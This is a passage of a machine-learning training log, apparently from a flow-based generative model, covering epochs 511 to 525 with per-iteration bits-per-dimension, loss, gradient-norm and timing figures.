10.00(10.00)\nIter 5553 | Time 42.9620(40.7568) | Bit/dim 1.0770(1.0750) | Xent 0.0000(0.0000) | Loss 1.0770(1.0750) | Error 0.0000(0.0000) Steps 446(448.21) | Grad Norm 0.0797(0.0949) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0511 | Time 15.1707, Epoch Time 314.8318(311.2271), Bit/dim 1.0697(best: 1.0697), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5554 | Time 40.7378(40.7563) | Bit/dim 1.0739(1.0750) | Xent 0.0000(0.0000) | Loss 1.0739(1.0750) | Error 0.0000(0.0000) Steps 446(448.14) | Grad Norm 0.0990(0.0950) | Total Time 10.00(10.00)\nIter 5555 | Time 40.9132(40.7610) | Bit/dim 1.0780(1.0751) | Xent 0.0000(0.0000) | Loss 1.0780(1.0751) | Error 0.0000(0.0000) Steps 446(448.08) | Grad Norm 0.0583(0.0939) | Total Time 10.00(10.00)\nIter 5556 | Time 40.7649(40.7611) | Bit/dim 1.0777(1.0752) | Xent 0.0000(0.0000) | Loss 1.0777(1.0752) | Error 0.0000(0.0000) Steps 452(448.19) | Grad Norm 0.0655(0.0931) | Total Time 10.00(10.00)\nIter 5557 | Time 40.3921(40.7500) | Bit/dim 1.0717(1.0750) | Xent 0.0000(0.0000) | Loss 1.0717(1.0750) | Error 0.0000(0.0000) Steps 452(448.31) | Grad Norm 0.0620(0.0922) | Total Time 10.00(10.00)\nIter 5558 | Time 41.9066(40.7847) | Bit/dim 1.0731(1.0750) | Xent 0.0000(0.0000) | Loss 1.0731(1.0750) | Error 0.0000(0.0000) Steps 446(448.24) | Grad Norm 0.0679(0.0914) | Total Time 10.00(10.00)\nIter 5559 | Time 40.6174(40.7797) | Bit/dim 1.0770(1.0751) | Xent 0.0000(0.0000) | Loss 1.0770(1.0751) | Error 0.0000(0.0000) Steps 446(448.17) | Grad Norm 0.0595(0.0905) | Total Time 10.00(10.00)\nIter 5560 | Time 39.2871(40.7349) | Bit/dim 1.0736(1.0750) | Xent 0.0000(0.0000) | Loss 1.0736(1.0750) | Error 0.0000(0.0000) Steps 446(448.11) | Grad Norm 0.0572(0.0895) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0512 | Time 15.0954, Epoch Time 312.4260(311.2631), Bit/dim 1.0695(best: 1.0697), Xent 0.0000, Loss 1.0695, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5561 | Time 39.6834(40.7034) | Bit/dim 1.0742(1.0750) | Xent 0.0000(0.0000) | Loss 1.0742(1.0750) | Error 0.0000(0.0000) Steps 452(448.22) | Grad Norm 0.0605(0.0886) | Total Time 10.00(10.00)\nIter 5562 | Time 39.1002(40.6553) | Bit/dim 1.0722(1.0749) | Xent 0.0000(0.0000) | Loss 1.0722(1.0749) | Error 0.0000(0.0000) Steps 446(448.16) | Grad Norm 0.0602(0.0877) | Total Time 10.00(10.00)\nIter 5563 | Time 39.5828(40.6231) | Bit/dim 1.0747(1.0749) | Xent 0.0000(0.0000) | Loss 1.0747(1.0749) | Error 0.0000(0.0000) Steps 452(448.27) | Grad Norm 0.0849(0.0877) | Total Time 10.00(10.00)\nIter 5564 | Time 39.6724(40.5946) | Bit/dim 1.0802(1.0751) | Xent 0.0000(0.0000) | Loss 1.0802(1.0751) | Error 0.0000(0.0000) Steps 446(448.20) | Grad Norm 0.0824(0.0875) | Total Time 10.00(10.00)\nIter 5565 | Time 39.5496(40.5632) | Bit/dim 1.0791(1.0752) | Xent 0.0000(0.0000) | Loss 1.0791(1.0752) | Error 0.0000(0.0000) Steps 446(448.14) | Grad Norm 0.0772(0.0872) | Total Time 10.00(10.00)\nIter 5566 | Time 41.8769(40.6026) | Bit/dim 1.0673(1.0749) | Xent 0.0000(0.0000) | Loss 1.0673(1.0749) | Error 0.0000(0.0000) Steps 446(448.07) | Grad Norm 0.0928(0.0874) | Total Time 10.00(10.00)\nIter 5567 | Time 41.4019(40.6266) | Bit/dim 1.0788(1.0751) | Xent 0.0000(0.0000) | Loss 1.0788(1.0751) | Error 0.0000(0.0000) Steps 452(448.19) | Grad Norm 0.0541(0.0864) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0513 | Time 15.1329, Epoch Time 308.3945(311.1770), Bit/dim 1.0701(best: 1.0695), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5568 | Time 40.9278(40.6357) | Bit/dim 1.0737(1.0750) | Xent 0.0000(0.0000) | Loss 1.0737(1.0750) | Error 0.0000(0.0000) Steps 446(448.13) | Grad Norm 0.1146(0.0872) | Total Time 10.00(10.00)\nIter 5569 | Time 40.9758(40.6459) | Bit/dim 1.0739(1.0750) | Xent 0.0000(0.0000) | Loss 1.0739(1.0750) | Error 0.0000(0.0000) Steps 446(448.06) | Grad Norm 0.0996(0.0876) | Total Time 10.00(10.00)\nIter 5570 | Time 39.1530(40.6011) | Bit/dim 1.0722(1.0749) | Xent 0.0000(0.0000) | Loss 1.0722(1.0749) | Error 0.0000(0.0000) Steps 452(448.18) | Grad Norm 0.0825(0.0874) | Total Time 10.00(10.00)\nIter 5571 | Time 39.9157(40.5805) | Bit/dim 1.0748(1.0749) | Xent 0.0000(0.0000) | Loss 1.0748(1.0749) | Error 0.0000(0.0000) Steps 446(448.12) | Grad Norm 0.0625(0.0867) | Total Time 10.00(10.00)\nIter 5572 | Time 41.2260(40.5999) | Bit/dim 1.0782(1.0750) | Xent 0.0000(0.0000) | Loss 1.0782(1.0750) | Error 0.0000(0.0000) Steps 446(448.05) | Grad Norm 0.0536(0.0857) | Total Time 10.00(10.00)\nIter 5573 | Time 39.8142(40.5763) | Bit/dim 1.0732(1.0749) | Xent 0.0000(0.0000) | Loss 1.0732(1.0749) | Error 0.0000(0.0000) Steps 452(448.17) | Grad Norm 0.0991(0.0861) | Total Time 10.00(10.00)\nIter 5574 | Time 41.7581(40.6118) | Bit/dim 1.0770(1.0750) | Xent 0.0000(0.0000) | Loss 1.0770(1.0750) | Error 0.0000(0.0000) Steps 452(448.29) | Grad Norm 0.0682(0.0856) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0514 | Time 15.3061, Epoch Time 311.4969(311.1866), Bit/dim 1.0699(best: 1.0695), Xent 0.0000, Loss 1.0699, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5575 | Time 41.6517(40.6430) | Bit/dim 1.0751(1.0750) | Xent 0.0000(0.0000) | Loss 1.0751(1.0750) | Error 0.0000(0.0000) Steps 452(448.40) | Grad Norm 0.0927(0.0858) | Total Time 10.00(10.00)\nIter 5576 | Time 39.3434(40.6040) | Bit/dim 1.0686(1.0748) | Xent 0.0000(0.0000) | Loss 1.0686(1.0748) | Error 0.0000(0.0000) Steps 446(448.32) | Grad Norm 0.0521(0.0848) | Total Time 10.00(10.00)\nIter 5577 | Time 40.2133(40.5923) | Bit/dim 1.0757(1.0748) | Xent 0.0000(0.0000) | Loss 1.0757(1.0748) | Error 0.0000(0.0000) Steps 446(448.25) | Grad Norm 0.1125(0.0856) | Total Time 10.00(10.00)\nIter 5578 | Time 39.3771(40.5558) | Bit/dim 1.0752(1.0748) | Xent 0.0000(0.0000) | Loss 1.0752(1.0748) | Error 0.0000(0.0000) Steps 452(448.37) | Grad Norm 0.0645(0.0850) | Total Time 10.00(10.00)\nIter 5579 | Time 40.4065(40.5513) | Bit/dim 1.0766(1.0749) | Xent 0.0000(0.0000) | Loss 1.0766(1.0749) | Error 0.0000(0.0000) Steps 452(448.48) | Grad Norm 0.0565(0.0841) | Total Time 10.00(10.00)\nIter 5580 | Time 42.6873(40.6154) | Bit/dim 1.0741(1.0749) | Xent 0.0000(0.0000) | Loss 1.0741(1.0749) | Error 0.0000(0.0000) Steps 446(448.40) | Grad Norm 0.0564(0.0833) | Total Time 10.00(10.00)\nIter 5581 | Time 39.5826(40.5844) | Bit/dim 1.0787(1.0750) | Xent 0.0000(0.0000) | Loss 1.0787(1.0750) | Error 0.0000(0.0000) Steps 452(448.51) | Grad Norm 0.0649(0.0827) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0515 | Time 15.2251, Epoch Time 311.1319(311.1850), Bit/dim 1.0697(best: 1.0695), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5582 | Time 41.3018(40.6059) | Bit/dim 1.0752(1.0750) | Xent 0.0000(0.0000) | Loss 1.0752(1.0750) | Error 0.0000(0.0000) Steps 446(448.43) | Grad Norm 0.0578(0.0820) | Total Time 10.00(10.00)\nIter 5583 | Time 41.5555(40.6344) | Bit/dim 1.0759(1.0750) | Xent 0.0000(0.0000) | Loss 1.0759(1.0750) | Error 0.0000(0.0000) Steps 446(448.36) | Grad Norm 0.1080(0.0828) | Total Time 10.00(10.00)\nIter 5584 | Time 40.4068(40.6276) | Bit/dim 1.0779(1.0751) | Xent 0.0000(0.0000) | Loss 1.0779(1.0751) | Error 0.0000(0.0000) Steps 452(448.47) | Grad Norm 0.0748(0.0825) | Total Time 10.00(10.00)\nIter 5585 | Time 39.8110(40.6031) | Bit/dim 1.0750(1.0751) | Xent 0.0000(0.0000) | Loss 1.0750(1.0751) | Error 0.0000(0.0000) Steps 446(448.40) | Grad Norm 0.0659(0.0820) | Total Time 10.00(10.00)\nIter 5586 | Time 41.4468(40.6284) | Bit/dim 1.0743(1.0751) | Xent 0.0000(0.0000) | Loss 1.0743(1.0751) | Error 0.0000(0.0000) Steps 446(448.32) | Grad Norm 0.0616(0.0814) | Total Time 10.00(10.00)\nIter 5587 | Time 41.3074(40.6488) | Bit/dim 1.0749(1.0751) | Xent 0.0000(0.0000) | Loss 1.0749(1.0751) | Error 0.0000(0.0000) Steps 446(448.25) | Grad Norm 0.0534(0.0806) | Total Time 10.00(10.00)\nIter 5588 | Time 39.1420(40.6036) | Bit/dim 1.0720(1.0750) | Xent 0.0000(0.0000) | Loss 1.0720(1.0750) | Error 0.0000(0.0000) Steps 452(448.37) | Grad Norm 0.0599(0.0800) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0516 | Time 15.2061, Epoch Time 312.7538(311.2320), Bit/dim 1.0694(best: 1.0695), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5589 | Time 39.5718(40.5726) | Bit/dim 1.0742(1.0750) | Xent 0.0000(0.0000) | Loss 1.0742(1.0750) | Error 0.0000(0.0000) Steps 446(448.30) | Grad Norm 0.0658(0.0795) | Total Time 10.00(10.00)\nIter 5590 | Time 38.6462(40.5148) | Bit/dim 1.0747(1.0750) | Xent 0.0000(0.0000) | Loss 1.0747(1.0750) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.0871(0.0798) | Total Time 10.00(10.00)\nIter 5591 | Time 39.9887(40.4990) | Bit/dim 1.0801(1.0751) | Xent 0.0000(0.0000) | Loss 1.0801(1.0751) | Error 0.0000(0.0000) Steps 446(448.16) | Grad Norm 0.0613(0.0792) | Total Time 10.00(10.00)\nIter 5592 | Time 40.5196(40.4997) | Bit/dim 1.0736(1.0751) | Xent 0.0000(0.0000) | Loss 1.0736(1.0751) | Error 0.0000(0.0000) Steps 452(448.28) | Grad Norm 0.0672(0.0788) | Total Time 10.00(10.00)\nIter 5593 | Time 41.1056(40.5178) | Bit/dim 1.0754(1.0751) | Xent 0.0000(0.0000) | Loss 1.0754(1.0751) | Error 0.0000(0.0000) Steps 452(448.39) | Grad Norm 0.0590(0.0782) | Total Time 10.00(10.00)\nIter 5594 | Time 42.8140(40.5867) | Bit/dim 1.0765(1.0751) | Xent 0.0000(0.0000) | Loss 1.0765(1.0751) | Error 0.0000(0.0000) Steps 452(448.50) | Grad Norm 0.0788(0.0783) | Total Time 10.00(10.00)\nIter 5595 | Time 41.5721(40.6163) | Bit/dim 1.0692(1.0749) | Xent 0.0000(0.0000) | Loss 1.0692(1.0749) | Error 0.0000(0.0000) Steps 446(448.42) | Grad Norm 0.0775(0.0782) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0517 | Time 15.1052, Epoch Time 311.8550(311.2507), Bit/dim 1.0697(best: 1.0694), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5596 | Time 39.4375(40.5809) | Bit/dim 1.0749(1.0749) | Xent 0.0000(0.0000) | Loss 1.0749(1.0749) | Error 0.0000(0.0000) Steps 452(448.53) | Grad Norm 0.0538(0.0775) | Total Time 10.00(10.00)\nIter 5597 | Time 41.1393(40.5977) | Bit/dim 1.0758(1.0750) | Xent 0.0000(0.0000) | Loss 1.0758(1.0750) | Error 0.0000(0.0000) Steps 446(448.45) | Grad Norm 0.0812(0.0776) | Total Time 10.00(10.00)\nIter 5598 | Time 41.3240(40.6195) | Bit/dim 1.0758(1.0750) | Xent 0.0000(0.0000) | Loss 1.0758(1.0750) | Error 0.0000(0.0000) Steps 452(448.56) | Grad Norm 0.0720(0.0774) | Total Time 10.00(10.00)\nIter 5599 | Time 39.3977(40.5828) | Bit/dim 1.0723(1.0749) | Xent 0.0000(0.0000) | Loss 1.0723(1.0749) | Error 0.0000(0.0000) Steps 446(448.48) | Grad Norm 0.0713(0.0773) | Total Time 10.00(10.00)\nIter 5600 | Time 39.4924(40.5501) | Bit/dim 1.0749(1.0749) | Xent 0.0000(0.0000) | Loss 1.0749(1.0749) | Error 0.0000(0.0000) Steps 452(448.59) | Grad Norm 0.0704(0.0771) | Total Time 10.00(10.00)\nIter 5601 | Time 39.7849(40.5271) | Bit/dim 1.0694(1.0747) | Xent 0.0000(0.0000) | Loss 1.0694(1.0747) | Error 0.0000(0.0000) Steps 446(448.51) | Grad Norm 0.0785(0.0771) | Total Time 10.00(10.00)\nIter 5602 | Time 40.6753(40.5316) | Bit/dim 1.0775(1.0748) | Xent 0.0000(0.0000) | Loss 1.0775(1.0748) | Error 0.0000(0.0000) Steps 452(448.61) | Grad Norm 0.0721(0.0770) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0518 | Time 15.0366, Epoch Time 308.9380(311.1813), Bit/dim 1.0701(best: 1.0694), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5603 | Time 40.9719(40.5448) | Bit/dim 1.0737(1.0748) | Xent 0.0000(0.0000) | Loss 1.0737(1.0748) | Error 0.0000(0.0000) Steps 446(448.54) | Grad Norm 0.0765(0.0769) | Total Time 10.00(10.00)\nIter 5604 | Time 39.9728(40.5276) | Bit/dim 1.0757(1.0748) | Xent 0.0000(0.0000) | Loss 1.0757(1.0748) | Error 0.0000(0.0000) Steps 452(448.64) | Grad Norm 0.0556(0.0763) | Total Time 10.00(10.00)\nIter 5605 | Time 39.4942(40.4966) | Bit/dim 1.0790(1.0749) | Xent 0.0000(0.0000) | Loss 1.0790(1.0749) | Error 0.0000(0.0000) Steps 452(448.74) | Grad Norm 0.0486(0.0755) | Total Time 10.00(10.00)\nIter 5606 | Time 40.5491(40.4982) | Bit/dim 1.0724(1.0749) | Xent 0.0000(0.0000) | Loss 1.0724(1.0749) | Error 0.0000(0.0000) Steps 446(448.66) | Grad Norm 0.1128(0.0766) | Total Time 10.00(10.00)\nIter 5607 | Time 39.4079(40.4655) | Bit/dim 1.0742(1.0748) | Xent 0.0000(0.0000) | Loss 1.0742(1.0748) | Error 0.0000(0.0000) Steps 452(448.76) | Grad Norm 0.0799(0.0767) | Total Time 10.00(10.00)\nIter 5608 | Time 39.8195(40.4461) | Bit/dim 1.0769(1.0749) | Xent 0.0000(0.0000) | Loss 1.0769(1.0749) | Error 0.0000(0.0000) Steps 446(448.68) | Grad Norm 0.0504(0.0759) | Total Time 10.00(10.00)\nIter 5609 | Time 40.8511(40.4583) | Bit/dim 1.0726(1.0748) | Xent 0.0000(0.0000) | Loss 1.0726(1.0748) | Error 0.0000(0.0000) Steps 446(448.60) | Grad Norm 0.0736(0.0758) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0519 | Time 15.2648, Epoch Time 308.7145(311.1073), Bit/dim 1.0688(best: 1.0694), Xent 0.0000, Loss 1.0688, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5610 | Time 40.8455(40.4699) | Bit/dim 1.0748(1.0748) | Xent 0.0000(0.0000) | Loss 1.0748(1.0748) | Error 0.0000(0.0000) Steps 452(448.70) | Grad Norm 0.0882(0.0762) | Total Time 10.00(10.00)\nIter 5611 | Time 41.2509(40.4933) | Bit/dim 1.0720(1.0747) | Xent 0.0000(0.0000) | Loss 1.0720(1.0747) | Error 0.0000(0.0000) Steps 446(448.62) | Grad Norm 0.0530(0.0755) | Total Time 10.00(10.00)\nIter 5612 | Time 40.0117(40.4789) | Bit/dim 1.0748(1.0748) | Xent 0.0000(0.0000) | Loss 1.0748(1.0748) | Error 0.0000(0.0000) Steps 446(448.54) | Grad Norm 0.0860(0.0758) | Total Time 10.00(10.00)\nIter 5613 | Time 39.9882(40.4641) | Bit/dim 1.0730(1.0747) | Xent 0.0000(0.0000) | Loss 1.0730(1.0747) | Error 0.0000(0.0000) Steps 446(448.46) | Grad Norm 0.1196(0.0771) | Total Time 10.00(10.00)\nIter 5614 | Time 41.8756(40.5065) | Bit/dim 1.0781(1.0748) | Xent 0.0000(0.0000) | Loss 1.0781(1.0748) | Error 0.0000(0.0000) Steps 452(448.57) | Grad Norm 0.0892(0.0775) | Total Time 10.00(10.00)\nIter 5615 | Time 41.0691(40.5234) | Bit/dim 1.0749(1.0748) | Xent 0.0000(0.0000) | Loss 1.0749(1.0748) | Error 0.0000(0.0000) Steps 446(448.49) | Grad Norm 0.0622(0.0770) | Total Time 10.00(10.00)\nIter 5616 | Time 40.2320(40.5146) | Bit/dim 1.0703(1.0747) | Xent 0.0000(0.0000) | Loss 1.0703(1.0747) | Error 0.0000(0.0000) Steps 446(448.42) | Grad Norm 0.1514(0.0793) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0520 | Time 15.2061, Epoch Time 313.2279(311.1710), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5617 | Time 40.3390(40.5094) | Bit/dim 1.0767(1.0747) | Xent 0.0000(0.0000) | Loss 1.0767(1.0747) | Error 0.0000(0.0000) Steps 446(448.34) | Grad Norm 0.0786(0.0792) | Total Time 10.00(10.00)\nIter 5618 | Time 39.7687(40.4871) | Bit/dim 1.0759(1.0748) | Xent 0.0000(0.0000) | Loss 1.0759(1.0748) | Error 0.0000(0.0000) Steps 452(448.45) | Grad Norm 0.0746(0.0791) | Total Time 10.00(10.00)\nIter 5619 | Time 40.8460(40.4979) | Bit/dim 1.0714(1.0747) | Xent 0.0000(0.0000) | Loss 1.0714(1.0747) | Error 0.0000(0.0000) Steps 452(448.56) | Grad Norm 0.0935(0.0795) | Total Time 10.00(10.00)\nIter 5620 | Time 41.1118(40.5163) | Bit/dim 1.0782(1.0748) | Xent 0.0000(0.0000) | Loss 1.0782(1.0748) | Error 0.0000(0.0000) Steps 452(448.66) | Grad Norm 0.1093(0.0804) | Total Time 10.00(10.00)\nIter 5621 | Time 41.5094(40.5461) | Bit/dim 1.0739(1.0747) | Xent 0.0000(0.0000) | Loss 1.0739(1.0747) | Error 0.0000(0.0000) Steps 446(448.58) | Grad Norm 0.0602(0.0798) | Total Time 10.00(10.00)\nIter 5622 | Time 39.9697(40.5288) | Bit/dim 1.0721(1.0747) | Xent 0.0000(0.0000) | Loss 1.0721(1.0747) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.0682(0.0795) | Total Time 10.00(10.00)\nIter 5623 | Time 42.8069(40.5972) | Bit/dim 1.0732(1.0746) | Xent 0.0000(0.0000) | Loss 1.0732(1.0746) | Error 0.0000(0.0000) Steps 452(448.79) | Grad Norm 0.0605(0.0789) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0521 | Time 14.9812, Epoch Time 313.8769(311.2521), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5624 | Time 39.9781(40.5786) | Bit/dim 1.0715(1.0745) | Xent 0.0000(0.0000) | Loss 1.0715(1.0745) | Error 0.0000(0.0000) Steps 446(448.70) | Grad Norm 0.0619(0.0784) | Total Time 10.00(10.00)\nIter 5625 | Time 39.3893(40.5429) | Bit/dim 1.0750(1.0745) | Xent 0.0000(0.0000) | Loss 1.0750(1.0745) | Error 0.0000(0.0000) Steps 446(448.62) | Grad Norm 0.0788(0.0784) | Total Time 10.00(10.00)\nIter 5626 | Time 39.5619(40.5135) | Bit/dim 1.0755(1.0746) | Xent 0.0000(0.0000) | Loss 1.0755(1.0746) | Error 0.0000(0.0000) Steps 446(448.54) | Grad Norm 0.0588(0.0778) | Total Time 10.00(10.00)\nIter 5627 | Time 41.8333(40.5531) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.0690(0.0776) | Total Time 10.00(10.00)\nIter 5628 | Time 41.1625(40.5714) | Bit/dim 1.0736(1.0745) | Xent 0.0000(0.0000) | Loss 1.0736(1.0745) | Error 0.0000(0.0000) Steps 446(448.39) | Grad Norm 0.0599(0.0770) | Total Time 10.00(10.00)\nIter 5629 | Time 41.2127(40.5906) | Bit/dim 1.0755(1.0745) | Xent 0.0000(0.0000) | Loss 1.0755(1.0745) | Error 0.0000(0.0000) Steps 446(448.32) | Grad Norm 0.1234(0.0784) | Total Time 10.00(10.00)\nIter 5630 | Time 40.2299(40.5798) | Bit/dim 1.0783(1.0746) | Xent 0.0000(0.0000) | Loss 1.0783(1.0746) | Error 0.0000(0.0000) Steps 446(448.25) | Grad Norm 0.0636(0.0780) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0522 | Time 15.1262, Epoch Time 310.8283(311.2394), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5631 | Time 40.1405(40.5666) | Bit/dim 1.0731(1.0746) | Xent 0.0000(0.0000) | Loss 1.0731(1.0746) | Error 0.0000(0.0000) Steps 446(448.18) | Grad Norm 0.0625(0.0775) | Total Time 10.00(10.00)\nIter 5632 | Time 40.9049(40.5767) | Bit/dim 1.0768(1.0747) | Xent 0.0000(0.0000) | Loss 1.0768(1.0747) | Error 0.0000(0.0000) Steps 446(448.12) | Grad Norm 0.0681(0.0772) | Total Time 10.00(10.00)\nIter 5633 | Time 40.0418(40.5607) | Bit/dim 1.0708(1.0745) | Xent 0.0000(0.0000) | Loss 1.0708(1.0745) | Error 0.0000(0.0000) Steps 452(448.23) | Grad Norm 0.0743(0.0771) | Total Time 10.00(10.00)\nIter 5634 | Time 41.3977(40.5858) | Bit/dim 1.0739(1.0745) | Xent 0.0000(0.0000) | Loss 1.0739(1.0745) | Error 0.0000(0.0000) Steps 446(448.17) | Grad Norm 0.0611(0.0767) | Total Time 10.00(10.00)\nIter 5635 | Time 41.8872(40.6249) | Bit/dim 1.0771(1.0746) | Xent 0.0000(0.0000) | Loss 1.0771(1.0746) | Error 0.0000(0.0000) Steps 452(448.28) | Grad Norm 0.0783(0.0767) | Total Time 10.00(10.00)\nIter 5636 | Time 39.0435(40.5774) | Bit/dim 1.0737(1.0746) | Xent 0.0000(0.0000) | Loss 1.0737(1.0746) | Error 0.0000(0.0000) Steps 446(448.21) | Grad Norm 0.0713(0.0765) | Total Time 10.00(10.00)\nIter 5637 | Time 39.5552(40.5467) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 452(448.33) | Grad Norm 0.0918(0.0770) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0523 | Time 15.1721, Epoch Time 310.9314(311.2302), Bit/dim 1.0690(best: 1.0688), Xent 0.0000, Loss 1.0690, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5638 | Time 39.1193(40.5039) | Bit/dim 1.0799(1.0747) | Xent 0.0000(0.0000) | Loss 1.0799(1.0747) | Error 0.0000(0.0000) Steps 446(448.26) | Grad Norm 0.0532(0.0763) | Total Time 10.00(10.00)\nIter 5639 | Time 39.5819(40.4763) | Bit/dim 1.0747(1.0747) | Xent 0.0000(0.0000) | Loss 1.0747(1.0747) | Error 0.0000(0.0000) Steps 446(448.19) | Grad Norm 0.0749(0.0762) | Total Time 10.00(10.00)\nIter 5640 | Time 40.0487(40.4634) | Bit/dim 1.0734(1.0746) | Xent 0.0000(0.0000) | Loss 1.0734(1.0746) | Error 0.0000(0.0000) Steps 452(448.30) | Grad Norm 0.1035(0.0771) | Total Time 10.00(10.00)\nIter 5641 | Time 42.0789(40.5119) | Bit/dim 1.0728(1.0746) | Xent 0.0000(0.0000) | Loss 1.0728(1.0746) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.0856(0.0773) | Total Time 10.00(10.00)\nIter 5642 | Time 40.3030(40.5056) | Bit/dim 1.0736(1.0746) | Xent 0.0000(0.0000) | Loss 1.0736(1.0746) | Error 0.0000(0.0000) Steps 446(448.17) | Grad Norm 0.0612(0.0768) | Total Time 10.00(10.00)\nIter 5643 | Time 42.6948(40.5713) | Bit/dim 1.0798(1.0747) | Xent 0.0000(0.0000) | Loss 1.0798(1.0747) | Error 0.0000(0.0000) Steps 458(448.46) | Grad Norm 0.0684(0.0766) | Total Time 10.00(10.00)\nIter 5644 | Time 39.4996(40.5392) | Bit/dim 1.0696(1.0746) | Xent 0.0000(0.0000) | Loss 1.0696(1.0746) | Error 0.0000(0.0000) Steps 452(448.57) | Grad Norm 0.1508(0.0788) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0524 | Time 15.1562, Epoch Time 310.9331(311.2213), Bit/dim 1.0693(best: 1.0688), Xent 0.0000, Loss 1.0693, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5645 | Time 40.5907(40.5407) | Bit/dim 1.0740(1.0745) | Xent 0.0000(0.0000) | Loss 1.0740(1.0745) | Error 0.0000(0.0000) Steps 452(448.67) | Grad Norm 0.1038(0.0796) | Total Time 10.00(10.00)\nIter 5646 | Time 40.9545(40.5531) | Bit/dim 1.0739(1.0745) | Xent 0.0000(0.0000) | Loss 1.0739(1.0745) | Error 0.0000(0.0000) Steps 446(448.59) | Grad Norm 0.0781(0.0795) | Total Time 10.00(10.00)\nIter 5647 | Time 40.5788(40.5539) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.0521(0.0787) | Total Time 10.00(10.00)\nIter 5648 | Time 40.0881(40.5399) | Bit/dim 1.0726(1.0744) | Xent 0.0000(0.0000) | Loss 1.0726(1.0744) | Error 0.0000(0.0000) Steps 452(448.79) | Grad Norm 0.2237(0.0830) | Total Time 10.00(10.00)\nIter 5649 | Time 41.8236(40.5784) | Bit/dim 1.0745(1.0744) | Xent 0.0000(0.0000) | Loss 1.0745(1.0744) | Error 0.0000(0.0000) Steps 446(448.71) | Grad Norm 0.1440(0.0849) | Total Time 10.00(10.00)\nIter 5650 | Time 40.3624(40.5719) | Bit/dim 1.0758(1.0745) | Xent 0.0000(0.0000) | Loss 1.0758(1.0745) | Error 0.0000(0.0000) Steps 446(448.63) | Grad Norm 0.0527(0.0839) | Total Time 10.00(10.00)\nIter 5651 | Time 41.6037(40.6029) | Bit/dim 1.0774(1.0746) | Xent 0.0000(0.0000) | Loss 1.0774(1.0746) | Error 0.0000(0.0000) Steps 446(448.55) | Grad Norm 0.0857(0.0840) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0525 | Time 14.9418, Epoch Time 313.3577(311.2854), Bit/dim 1.0697(best: 1.0688), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5652 | Time 40.3744(40.5960) | Bit/dim 1.0742(1.0746) | Xent 0.0000(0.0000) | Loss 1.0742(1.0746) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.1883(0.0871) | Total Time 10.00(10.00)\nIter 5653 | Time 42.0970(40.6411) | Bit/dim 1.0737(1.0745) | Xent 0.0000(0.0000) | Loss 1.0737(1.0745) | Error 0.0000(0.0000) Steps 452(448.58) | Grad Norm 0.1748(0.0897) | Total Time 10.00(10.00)\nIter 5654 | Time 40.5637(40.6388) | Bit/dim 1.0743(1.0745) | Xent 0.0000(0.0000) | Loss 1.0743(1.0745) | Error 0.0000(0.0000) Steps 446(448.50) | Grad Norm 0.0550(0.0887) | Total Time 10.00(10.00)\nIter 5655 | Time 40.9158(40.6471) | Bit/dim 1.0754(1.0746) | Xent 0.0000(0.0000) | Loss 1.0754(1.0746) | Error 0.0000(0.0000) Steps 446(448.43) | Grad Norm 0.1913(0.0918) | Total Time 10.00(10.00)\nIter 5656 | Time 40.8262(40.6524) | Bit/dim 1.0749(1.0746) | Xent 0.0000(0.0000) | Loss 1.0749(1.0746) | Error 0.0000(0.0000) Steps 452(448.53) | Grad Norm 0.1622(0.0939) | Total Time 10.00(10.00)\nIter 5657 | Time 39.0044(40.6030) | Bit/dim 1.0763(1.0746) | Xent 0.0000(0.0000) | Loss 1.0763(1.0746) | Error 